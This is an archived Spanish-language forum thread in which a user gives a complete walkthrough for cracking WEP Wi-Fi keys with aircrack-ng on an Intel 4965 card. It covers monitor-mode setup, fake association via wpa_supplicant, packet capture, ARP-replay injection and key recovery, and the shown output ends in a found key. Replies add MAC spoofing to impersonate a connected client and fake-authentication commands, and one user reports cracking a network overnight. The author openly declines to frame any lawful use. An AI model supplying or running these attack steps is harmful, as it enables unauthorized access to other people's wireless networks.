PDA

Ver la Versión Completa : Manual aircrack con inalámbrica intel 4965 (driver iwlagn)



Physlord
11-mar-2010, 00:58
El siguiente tutorial tiene la intención de mostrar el uso del conocido programa aircrack para obtener la clave WEP de una red encriptada usando una targeta inalámbrica Intel PRO/Wireless 4965 que utiliza el driver "iwlagn", este tipo de inalámbricas tienen algunos problemas para ejecutarse siguiendo los pasos "tradicionales" que se encuentran en la mayoría de las guías que hay en la red.

Me ahorraré el trabajo de inventar algún posible escenario donde legalmente sería necesario usar el programa. El uso que se de a este tutorial queda bajo la completa responsabilidad de quien lo usa.

Nota: Al realizar este manual tenía gestionada la red mediante ifup y no con el networkmanager.

Lo primero es instalar aircrack. Dicho programa lo pueden encontrar en este repositorio:

http://download.opensuse.org/repositories/home:/primdorf/openSUSE_11.2

A continuación vamos a obtener algunos datos útiles para continuar. Primero necesitamos obtener la dirección física o MAC address de nuestra targeta de red, para ello podemos ejecutar como administrador el comando (la almoadilla # solo se usa para denotar que el comando se ejecuta como superusuario, no es parte de la instrucción)


# ifconfig wlan0 (en caso necesario, cámbiese wlan0 por el correspondiente a su dispositivo inalámbrico).

obtendrémos una salida como la siguiente:


wlan0 Link encap:Ethernet HWaddr 00:25:5B:1A:D6:41
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)


En particular el dato que nos interesa es lo que está frente a HWaddr (por razones de privacidad he cambiado la MAC address real de mi computadora, los mismo haré para la WEP key y la dirección física de la red).

A continuación obtendremos los datos de la red cuya clave tratamos de obtener, una forma sencilla de hacerlo es ejecutar en consola y como superusuario el siguiente comando:


# iwlist wlan0 scan

con lo que obtendremos un listado de las redes a nuestro alcance, la intensidad, la dirección física y algunos datos más. Para nuestro ejemplo descifraremos la clave de la red "SOLO-INTERNET". Cabe señalar que de antemano conozco dicha clave ya que es la red pública de la universidad donde trabajo. El comando anterior en este caso arroja una salida como la siguiente:


wlan0 Scan completed :
Cell 01 - Address: 00:15:5E:FF:B2:30
Channel:1
Frequency:2.412 GHz (Channel 1)
Quality=61/70 Signal level=-49 dBm
Encryption key:on
ESSID:"SOLO-INTERNET"
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
11 Mb/s; 12 Mb/s; 18 Mb/s
Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
Mode:Master

y algunos datos más que son irrelevantes.

Ahora tenemos todos los datos que necesitamos. En seguida desactivamos la targeta inalámbrica ejecutando como root el comando


# ifdown wlan0

A continuación configuraremos la inalámbrica para establecer el canal a usar y la taza de transmisión que queremos. En este caso es el canal 1 y usaremos la taza de 6 Mb/s de la siguiente forma


iwconfig wlan0 rate 6M channel 1

Dado que con el driver iwlagn no se puede hacer la inyección de datos ni poner en modo monitor es necesario crear una "interface monitor". Para hacerlo solo debemos invocar como root el siguiente comando


# airmon-ng start wlan0

que en mi caso arroja la siguiente salida


Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
3515 avahi-daemon
8080 dhcpcd
8081 dhcpcd


Interface Chipset Driver

wlan0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)


La primera parte es muy explícita, en caso de que algo falle hay que matar esos procesos, en mi caso no fue necesario. Al final se muestra la interface que se habilitó en modo monitor, esta es "mon0" y es la que usaremos más adelante.

Otro problema es que con esta targeta no se puede hacer la asociación falsa con el punto de acceso. Afortunadamente podemos sobrepasar exitosamente este problema. Para esto usaremos wpa_supplicant. Primero crearemos un archivo de configuración (con kwrite) que en mi caso guardaré en /home/physlord/ con el nombre de wpa_supplicant.conf con el siguiente contenido:


network={
ssid="SOLO-INTERNET"
key_mgmt=NONE
wep_key0="fakekey"
}


Evidentemente en el apartado ssid va el nombre de la red, en este caso "SOLO-INTERNET".

Ahora corremos el programa y le indicamos que use el archivo de configuración recién creado con un comando como el siguiente


# wpa_supplicant -c/home/physlord/wpa_supplicant.conf -Dwext -iwlan0 -dd

obsérvece que no hay espacio entre las opciones y sus valores. Después de la opción -i va la el dispositivo que usaremos, en este caso wlan0. Este comando desplegará en pantalla una buena cantidad de texto, deberá aparecer en algún lugar un par de lineas como las siguientes


State: ASSOCIATED -> COMPLETED
CTRL-EVENT-CONNECTED - Connection to 00:15:5E:FF:B2:30 completed (auth) [id=0 id_str=]

que indica que la asociación fue exitosa; dejelo corriendo y abra una nueva consola (en una nueva pestaña o ventana).

De nuevo ingrese como root. En seguida iniciaremos la captura de paquetes, en este caso intenté hacer el cambio de la dirección física de la inalámbrica o de la interface monitor, ninguna de las dos funcionó. Así que directamente procederemos con la captura de paquetes con el siguiente comando


# airodump-ng --bssid 00:15:5E:FF:B2:30 -w solo_internet -c 1 mon0

donde 00:15:5E:FF:B2:30 es la dirección física de la red, solo_internet es el nombré del archivo donde se guardarán los datos, 1 es el canal y mon0 es la interface monitor Al ejecutar esta deberá iniciar la captura, deje el programa corriendo, abra una nueva consola e ingrese como superusuario.

En seguida vamos a iniciar con la inyección de paquetes para que la taza de captura aumente y con ello nuestras posibilidades de éxito. Para ello ejecutamos el siguiente comando


# aireplay-ng -3 -b 00:15:5E:FF:B2:30 -h 00:25:5B:1A:D6:41 mon0

Donde 00:15:5E:FF:B2:30 es la dirección física de la red y 00:25:5B:1A:D6:41 es la dirección física de la tarjeta inalámbrica. Hecho esto la taza de paquetes en la pestaña donde ejecutamos airodump-ng debería incrementarse notablemente. Una vez que el número de paquetes
bajo el área #Data sobrepase los 5000 (entre más mejor) podemos detener todos los procesos que iniciamos (Ctrl+c en las tres pestañas).

En seguida ejecutamos el siguiente comando


# aircrack-ng -x -0 solo_internet-01.cap

donde solo_internet.cap es el nombre del archivo que creamos a partir del comando airodump-ng. Cruzamos los dedos y esperamos a que aparezca
la clave WEP. En este caso en la consola apreció algo como


Opening solo_internet-01.cap
Read 160402 packets.

# BSSID ESSID Encryption

1 00:15:5E:FF:B2:30 SOLO-INTERNET WEP (79305 IVs)

Choosing first network as target.

Opening solo_internet-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 79305 ivs.
KEY FOUND! [ 56:23:21:17:08 ]
Decrypted correctly: 100%


Eso es todo, espero que les sirva. Saludos!!

ska_lariak
02-dic-2010, 06:18
yo tengo una duda como puedo cambir mi diraccion mac

Physlord
04-dic-2010, 19:13
Si tu dispositivo lo sporta puedes cambiar la dirección con este comando (como root):


# ifconfig wlan0 hw ether 00:11:22:33:44:55

donde wlan0 es tu dispositivo de red (funciona tanto con tarjeta de red cableada como inalámbrica) y 00:11:22:33:44:55 es la mac que quieres usar. Evita usar la del ejemplo ya que hay mucho dispositivos que no aceptan dicha dirección.

Si estás haciendo un ataque a una red y ya hay un dispositivo conectado (airmon te da esa info) puedes usar la dirección de ese dispositivo para la asociación y posteriormente iniciar la inyección de paquetes (por ejemplo con un ataque chop-chop).

Una nota importante. NO todos los ataques son exitosos, hay veces que simplemente nada funciona.

Defton
04-dic-2010, 21:51
excelente tutorial, solo me gustaria agregar algo. Es recomendable iniciar primero airodump con su respectivo archivo de captura, canal, etc. antes de intentar "asociarnos" con el AP


...Una nota importante. NO todos los ataques son exitosos, hay veces que simplemente nada funciona.

muy cierto, aunque ay que tomar varias cosas en consideración, como la distancia entre el atacante y el AP, lógicamente entre mas lejos estemos mas tardara en obtener "Data" o ivs's.
otra cosa que me gustaría agregar, y que e visto que es un error muy común.
Cuando el nombre de la red a la que estamos atacando tiene un espacio en el nombre como por ejemplo:

mi red wifi

es necesario indicar dicho nombre entre comillas para que no nos marque error, un ejemplo con este mismo nombre de red:


aireplay-ng -1 0 -e "mi red wifi" -a XX:XX:XX:XX -h YY:YY:YY:YY (interfaz)aunque en este caso no aplica por que veo que la falsa autenticacion se hace con wpa_supplicant.

gps_bto
05-dic-2010, 05:33
muy buen tutorar de lujo con el pude obtener una clave wifi solo lo deje toda la noche cargando paquetes ( esq me quede dormido xD) pero a hora tengo una pregunta al intentar hacerlo a una señal el el cananl 6 por ejemplo me da error solo cambie el cannal 1 por el 6 en "iwconfig wlan0 rate 6M channel 6" pero en airdump me decia que no pertenecía al canal 1 que esperara 2 horas pero no avanzaba

y me gustaria saber que cambiar para utilizarlo en cualquier canal

muchas graxias por su atencion y tiempo........xD
__________________________________________________ ____
¿ que reside en el lugar mas lejano de la memoria? El lugar en el que todo nace y todo vuelve:el Gran Planeta Azul